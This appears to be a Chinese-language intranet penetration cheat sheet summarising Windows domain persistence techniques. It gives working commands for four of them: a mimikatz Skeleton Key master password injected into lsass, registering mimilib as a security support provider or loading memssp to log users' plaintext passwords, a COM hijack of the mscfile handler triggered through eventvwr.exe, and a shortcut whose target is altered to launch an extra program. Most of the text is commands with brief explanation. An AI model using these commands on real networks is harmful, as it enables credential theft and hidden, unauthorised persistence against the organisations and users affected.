內網滲透｜域內持久權限維持總結

0x01 萬能密碼（Skeleton Key）

將自身注入lsass進程創建一個主密碼，可以適用于域內的任意賬戶。

前提條件是擁有域管權限。

mimikatz執行：

privilege::debug
misc::skeleton

然后ipc連接域控

0x02 SSP

SSPI 將負責為想要通信的兩臺機器找到合適的協議。對此的首選方法是 Kerberos。然后 SSPI 將協商將使用哪種身份驗證協議，這些身份驗證協議稱為安全支持提供程序 (SSP)，以 DLL 的形式位于每臺 Windows 機器內部，并且兩臺機器必須支持相同才能進行通信。

我們可以自己創建ssp，捕獲明文。

2.1 注冊SSP DLL

1.將mimilib.dll復制到system32目錄下

move mimilib.dll %systemroot%\system32

2.查看Security Packages

reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

3.修改Security Packages值

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ

密碼會保存在:

C:\Windows\System32\kiwissp.log

會產生事件ID為4657的日志。

2.2 內存加載

privilege::debug
misc::memssp

當用戶登錄的時候密碼會儲存在

C:\Windows\system32\mimilsa.log

0x03 com劫持

Microsoft 組件對象模型 (COM) 是一個獨立于平臺、分布式、面向對象的系統，用于創建可以交互的二進制軟件組件。

我們可以更改事件管理器，使其打開啟動我們的二進制文件。

修改

HKCU\SOFTWARE\Classes\mscfile\shell\open\command

將原來的

%SystemRoot%\system32\mmc.exe "%1" %*

修改為：

C:\windows\system32\cmd.exe

執行：

reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "c:\windows\system32\cmd.exe /c \"start cmd\"" /f
eventvwr.exe

0x04 lnk

這里以該快捷文件為例：

修改目標為：

powershell.exe -c "invoke-item C:\Users\Administrator\Desktop\AdExplorer\ADExplorer64.exe; invoke-item c:\windows\system32\calc.exe"

再把圖標修改回來：

運行lnk